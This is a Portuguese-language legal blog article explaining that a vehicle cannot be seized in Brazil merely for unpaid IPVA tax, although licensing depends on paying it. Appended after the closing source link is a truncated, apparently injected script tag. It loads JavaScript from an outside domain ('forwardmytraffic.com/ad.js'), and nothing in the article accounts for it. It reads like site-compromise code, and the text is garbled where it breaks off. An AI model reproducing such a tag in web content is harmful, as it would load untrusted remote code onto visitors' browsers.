O veículo pode ser apreendido por falta do pagamento do IPVA?
Em tese, não. Contudo, há ressalva a ser observada:
A autoridade policial não tem respaldo em princípios tributários para apreender veículos com tributos atrasados. Ademais, o Supremo Tribunal Federal já deixou claro seu posicionamento acerca da inconstitucionalidade do Estado em apreender bens com o finalidade de arrecadar tributos em diversos acórdãos e até mesmo súmulas.
Então, em qual hipóteses o veículo pode ser apreendido por falta de pagamento de IPVA?
O que será verificado em uma Blitz pela autoridade policial é a conformidade do licenciamento. Se este estiver de acordo mas o pagamento do IPVA não, o veículo certamente não pode ser apreendido.
Entretanto, essa situação só é praticável durante alguns meses, pois, após pouco tempo do vencimento do IPVA, se faz necessário fazer o licenciamento do ano corrente, o que não é permitido sem que haja a devida quitação dos tributos inerentes ao veículo.
Conclusão
Por todo o exposto, resta claro que a irregularidade no pagamento do Imposto sobre a Propriedade de Veículos Automotores (IPVA) não pode ser motivo exclusivo para apreensão de veículos.
Vale salientar que a melhor opção é manter as obrigações tributárias adimplentes, e, sempre que restarem dúvidas, contar com auxílio profissional de um especialista.
Ademais, insta salientar que o presente artigo não tem por escopo esgotar a matéria, mas fomentar a discussão sobre o tema.
https://rafaelafavero.jusbrasil.com.br/artigos/611963446/carro-com-o-ipva-atrasado-pode-ser-apreendido?utm_campaign=newsletter-daily_20180815_7456&utm_medium=email&utm_source=newsletter… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>